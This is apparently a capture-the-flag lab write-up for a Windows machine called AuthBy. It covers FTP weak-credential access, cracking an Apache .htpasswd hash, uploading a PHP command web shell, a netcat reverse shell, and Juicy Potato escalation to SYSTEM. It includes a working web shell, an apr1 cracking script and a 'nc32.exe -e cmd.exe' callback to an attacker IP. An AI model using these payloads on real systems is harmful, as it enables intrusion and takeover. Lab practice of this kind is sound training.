# AuthBy

`ftp`

* Machine name: AuthBy
* Difficulty: Intermediate
* OS: Windows

## Enumeration

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-06 03:40 EDT
Nmap scan report for 192.168.212.46
Host is up (0.035s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE SERVICE            VERSION
21/tcp   open  ftp                zFTPServer 6.0 build 2011-10-17
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| total 9680
| ----------   1 root     root      5610496 Oct 18  2011 zFTPServer.exe
| ----------   1 root     root           25 Feb 10  2011 UninstallService.bat
| ----------   1 root     root      4284928 Oct 18  2011 Uninstall.exe
| ----------   1 root     root           17 Aug 13  2011 StopService.bat
| ----------   1 root     root           18 Aug 13  2011 StartService.bat
| ----------   1 root     root         8736 Nov 09  2011 Settings.ini
| dr-xr-xr-x   1 root     root          512 Aug 06 14:40 log
| ----------   1 root     root         2275 Aug 08  2011 LICENSE.htm
| ----------   1 root     root           23 Feb 10  2011 InstallService.bat
| dr-xr-xr-x   1 root     root          512 Nov 08  2011 extensions
| dr-xr-xr-x   1 root     root          512 Nov 08  2011 certificates
|_dr-xr-xr-x   1 root     root          512 Apr 12 01:39 accounts
242/tcp  open  http               Apache httpd 2.2.21 ((Win32) PHP/5.3.8)
|_http-title: 401 Authorization Required
| http-auth: 
| HTTP/1.1 401 Authorization Required\x0D
|_  Basic realm=Qui e nuce nuculeum esse volt, frangit nucem!
|_http-server-header: Apache/2.2.21 (Win32) PHP/5.3.8
3145/tcp open  zftp-admin         zFTPServer admin
3389/tcp open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: LIVDA
|   NetBIOS_Domain_Name: LIVDA
|   NetBIOS_Computer_Name: LIVDA
|   DNS_Domain_Name: LIVDA
|   DNS_Computer_Name: LIVDA
|   Product_Version: 6.0.6001
|_  System_Time: 2024-08-06T07:43:16+00:00
|_ssl-date: 2024-08-06T07:43:21+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=LIVDA
| Not valid before: 2024-04-10T18:40:02
|_Not valid after:  2024-10-10T18:40:02
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

### FTP (21) : zFTPServer 6.0 build 2011-10-17

As the nmap scan shows, we can log in to the FTP server anonymously. On its own this gives us little: none of the files can be downloaded (note the `----------` modes in the listing). Listing the `accounts` directory does, however, reveal three user accounts:

* Offsec
* Anonymous
* Admin

We try a few obvious passwords against these users, and `admin:admin` works:

```
┌──(kali㉿kali)-[~/oscp/astro]
└─$ ftp 192.168.212.46          
Connected to 192.168.212.46.
220 zFTPServer v6.0, build 2011-10-17 15:25 ready.
Name (192.168.212.46:kali): admin
331 User name received, need password.
Password: 
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||2093|)
150 Opening connection for /bin/ls.
total 3
-r--r--r--   1 root     root           76 Nov 08  2011 index.php
-r--r--r--   1 root     root           45 Nov 08  2011 .htpasswd
-r--r--r--   1 root     root          161 Nov 08  2011 .htaccess
226 Closing data connection.
ftp> mget *
```

```
┌──(kali㉿kali)-[~/oscp/astro]
└─$ cat .*       
AuthName "Qui e nuce nuculeum esse volt, frangit nucem!"
AuthType Basic
AuthUserFile c:\\wamp\www\.htpasswd
<Limit GET POST PUT>
Require valid-user
</Limit>offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0

┌──(kali㉿kali)-[~/oscp/astro]
└─$ echo '$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0' > hash.txt 
                                                                             
┌──(kali㉿kali)-[~/oscp/astro]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
elite            (?)     
1g 0:00:00:00 DONE (2024-08-06 05:30) 16.66g/s 424000p/s 424000c/s 424000C/s 191192..tyler03
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
```

John recovers the password almost instantly: `offsec:elite`
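To see what john is actually doing with that `$apr1$` string, here is an added Python example (not part of the original writeup) that implements Apache's `apr1` MD5-crypt variant, parses an `.htpasswd` file and checks candidate passwords against it. The `.htpasswd` content is the single line recovered above, embedded as a constructed sample; the short wordlist is constructed too.

```python
import hashlib
import hmac
from typing import Dict, Iterable, Optional

# Apache's own base64 alphabet (not the RFC 4648 one)
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Constructed sample: the .htpasswd line recovered over FTP above.
HTPASSWD = "offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0\n"


def _to64(value: int, count: int) -> str:
    """Emit `count` characters, lowest 6 bits first (Apache's to64())."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_md5(password: bytes, salt: bytes) -> str:
    """Compute an Apache $apr1$ hash (MD5-crypt with the 'apr1' magic)."""
    magic = b"$apr1$"
    salt = salt[:8]  # htpasswd uses at most 8 salt characters

    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()

    # Mix in the alternate digest, 16 bytes per 16 bytes of password length
    remaining = len(password)
    while remaining > 0:
        ctx.update(alt[: min(remaining, 16)])
        remaining -= 16

    # For each bit of the password length: a NUL byte or the first byte of pw
    i = len(password)
    while i:
        ctx.update(b"\x00" if i & 1 else password[:1])
        i >>= 1
    final = ctx.digest()

    # 1000 stretching rounds whose input order depends on the round number
    for r in range(1000):
        ctx1 = hashlib.md5()
        ctx1.update(password if r & 1 else final)
        if r % 3:
            ctx1.update(salt)
        if r % 7:
            ctx1.update(password)
        ctx1.update(final if r & 1 else password)
        final = ctx1.digest()

    f = final
    encoded = (
        _to64((f[0] << 16) | (f[6] << 8) | f[12], 4)
        + _to64((f[1] << 16) | (f[7] << 8) | f[13], 4)
        + _to64((f[2] << 16) | (f[8] << 8) | f[14], 4)
        + _to64((f[3] << 16) | (f[9] << 8) | f[15], 4)
        + _to64((f[4] << 16) | (f[10] << 8) | f[5], 4)
        + _to64(f[11], 2)
    )
    return (magic + salt).decode() + "$" + encoded


def verify_apr1(password: str, stored: str) -> bool:
    """Check a candidate against a full '$apr1$<salt>$<hash>' string."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[1] != "apr1":
        return False
    computed = apr1_md5(password.encode(), parts[2].encode())
    return hmac.compare_digest(computed, stored)


def parse_htpasswd(text: str) -> Dict[str, str]:
    """Map user -> stored hash, skipping blank and comment lines."""
    users = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, stored = line.split(":", 1)
        users[user] = stored
    return users


def crack(stored: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate that matches, or None."""
    for cand in candidates:
        if verify_apr1(cand, stored):
            return cand
    return None


if __name__ == "__main__":
    wordlist = ["password", "admin", "offsec", "elite"]  # constructed mini-wordlist
    for user, stored in parse_htpasswd(HTPASSWD).items():
        print(f"{user}: {crack(stored, wordlist)}")
```

`$apr1$` is MD5 with 1000 rounds and an 8-character salt, which is why rockyou falls in under a second; on a real deployment `htpasswd -B` (bcrypt) is the setting to use. Note also that Apache's default `<FilesMatch "^\.ht">` rule only stops the web server from serving `.htpasswd`; it does nothing against an FTP account whose root is the same directory.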

### zFTP-admin (3145) : zFTPServer admin

We cannot connect to it for now.

### HTTP (242)

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2F7RBrSB4rSNqMOvveDTCA%2F7d3a7ef35d475c591f56169696f5c6ed.png?alt=media&#x26;token=d684b18f-f4b2-483a-9e8e-3e85efb38bc2" alt=""><figcaption></figcaption></figure>

Enter the credentials recovered from `.htpasswd` (`offsec:elite`) to access the page. The Basic auth realm shown by nmap (`Qui e nuce nuculeum esse volt, frangit nucem!`) is the `AuthName` from the `.htaccess` we downloaded, so this is the same protection.

## Local exploitation

Now that we have access to the web page and can log in over FTP as `admin`, we can upload a PHP web shell to the server. The files `admin` sees over FTP (`index.php`, `.htaccess`, `.htpasswd`) are those of the web root `c:\wamp\www` referenced in `AuthUserFile`, so any PHP file uploaded there is executed by Apache when requested.

```
┌──(kali㉿kali)-[~]
└─$ cat shell.php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
```

```
┌──(kali㉿kali)-[~]
└─$ ftp 192.168.212.46
Connected to 192.168.212.46.
220 zFTPServer v6.0, build 2011-10-17 15:25 ready.
Name (192.168.212.46:kali): admin
331 User name received, need password.
Password: 
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||2051|)
150 File status okay; about to open data connection.
100% |********************************|  1401      942.26 KiB/s    00:00 ETA
226 Closing data connection.
348 bytes sent in 00:00 (18.02 KiB/s)
```

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FcLfqkNAzpMXmVk0arYg4%2F07f65129544484525de2b0b94baa5a8b.png?alt=media&#x26;token=bd02f7be-ef65-4c87-b13b-525878741764" alt=""><figcaption></figcaption></figure>

For the reverse shell, we first try the base64-encoded PowerShell payload from:

<https://www.revshells.com/>

We start a listener before executing the command through the web shell.

It does not work!

With no callback, we try Ivan Sincek's PHP reverse shell instead: it works!

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 242 
listening on [any] 242 ...
connect to [192.168.45.240] from (UNKNOWN) [192.168.163.46] 49159
SOCKET: Shell has connected! PID: 2712
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\wamp\bin\apache\Apache2.2.21>whoami
livda\apache
```

## Privilege escalation

```
C:\Users\apache\Desktop>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
```

`SeImpersonatePrivilege` is enabled for the `apache` service account, which is the prerequisite for a Potato-style token impersonation attack.

```
C:\Users\apache\Desktop>systeminfo

Host Name:                 LIVDA
OS Name:                   Microsoft® Windows Server® 2008 Standard 
OS Version:                6.0.6001 Service Pack 1 Build 6001
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                92573-OEM-7502905-27565
Original Install Date:     12/19/2009, 11:25:57 AM
System Boot Time:          8/30/2024, 6:06:21 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
```

The target is a 32-bit system (`X86-based PC`) running Windows Server 2008 SP1, so we need the x86 build of Juicy Potato:

{% embed url="<https://github.com/ivanitlearning/Juicy-Potato-x86/releases>" %}
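The two checks above (`whoami /priv` for `SeImpersonatePrivilege`, `systeminfo` for the architecture) are what decide which Potato binary to bring. As an added example (not part of the original writeup), the following Python script parses both outputs and summarises what the token and host allow; the privilege list and its annotations are this example's own selection, and the two samples are trimmed copies of the output shown above, embedded so the script runs offline.

```python
import re
from typing import Dict

# Constructed samples: trimmed copies of the "whoami /priv" and "systeminfo"
# output captured above on this page.
WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

SYSTEMINFO = """\
Host Name:                 LIVDA
OS Name:                   Microsoft Windows Server 2008 Standard
OS Version:                6.0.6001 Service Pack 1 Build 6001
System Type:               X86-based PC
"""

# Privileges worth flagging and the abuse each enables (this example's own list).
ABUSABLE = {
    "SeImpersonatePrivilege": "token impersonation (Juicy/Rogue Potato, PrintSpoofer)",
    "SeAssignPrimaryTokenPrivilege": "token impersonation (Juicy/Rogue Potato, PrintSpoofer)",
    "SeBackupPrivilege": "read any file (SAM/SYSTEM hive copy)",
    "SeRestorePrivilege": "write any file (service binary / DLL overwrite)",
    "SeDebugPrivilege": "open any process (LSASS dump, injection)",
    "SeTakeOwnershipPrivilege": "take ownership of arbitrary objects",
    "SeLoadDriverPrivilege": "load a kernel driver",
}
POTATO_PRIVS = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")

PRIV_RE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")
INFO_RE = re.compile(r"^([A-Za-z][A-Za-z ()]*?):\s+(.*?)\s*$")


def parse_privs(text: str) -> Dict[str, str]:
    """Map privilege name -> 'Enabled'/'Disabled' from whoami /priv output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_RE.match(line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def parse_systeminfo(text: str) -> Dict[str, str]:
    """Map 'Key' -> 'value' for the one-line fields of systeminfo."""
    info = {}
    for line in text.splitlines():
        m = INFO_RE.match(line)
        if m:
            info[m.group(1)] = m.group(2)
    return info


def arch_of(info: Dict[str, str]) -> str:
    """'x86' or 'x64' from the 'System Type' field, 'unknown' otherwise."""
    system_type = info.get("System Type", "").lower()
    if system_type.startswith("x64"):
        return "x64"
    if system_type.startswith("x86"):
        return "x86"
    return "unknown"


def triage(priv_text: str, sysinfo_text: str) -> dict:
    """Summarise what the current token and host allow."""
    privs = parse_privs(priv_text)
    info = parse_systeminfo(sysinfo_text)
    enabled = {p: ABUSABLE[p] for p, s in privs.items() if p in ABUSABLE and s == "Enabled"}
    # A 'Disabled' privilege is still held by the token; it only needs to be
    # switched on with AdjustTokenPrivileges before use, so report it as well.
    held_disabled = [p for p, s in privs.items() if p in ABUSABLE and s == "Disabled"]
    return {
        "host": info.get("Host Name", ""),
        "os_version": info.get("OS Version", ""),
        "arch": arch_of(info),
        "abusable_enabled": enabled,
        "abusable_disabled": held_disabled,
        "potato_candidate": any(p in enabled for p in POTATO_PRIVS),
    }


if __name__ == "__main__":
    for key, value in triage(WHOAMI_PRIV, SYSTEMINFO).items():
        print(f"{key}: {value}")
```

The `arch` field is what selects the x86 release linked above; running an x64 Juicy Potato on this host would simply fail to execute. One caveat for reuse elsewhere: Juicy Potato depends on DCOM behaviour that Microsoft changed in Windows 10 1809 / Server 2019, so a `potato_candidate` result on a newer host points at RoguePotato or PrintSpoofer instead.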

We also upload `nc32.exe` (a 32-bit netcat build) to the target, then run Juicy Potato with a CLSID for this system so that it spawns `cmd.exe` as SYSTEM and sends a shell back to our listener:

```
C:\Users\apache\Desktop>juicy.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\users\apache\desktop\nc32.exe -e cmd.exe 192.168.45.240 242" -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020}
Testing {03ca98d6-ff5d-49b8-abc6-03dd84127020} 1337
....
[+] authresult 0
{03ca98d6-ff5d-49b8-abc6-03dd84127020};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK
```

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 242
listening on [any] 242 ...
connect to [192.168.45.240] from (UNKNOWN) [192.168.163.46] 49453
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
```
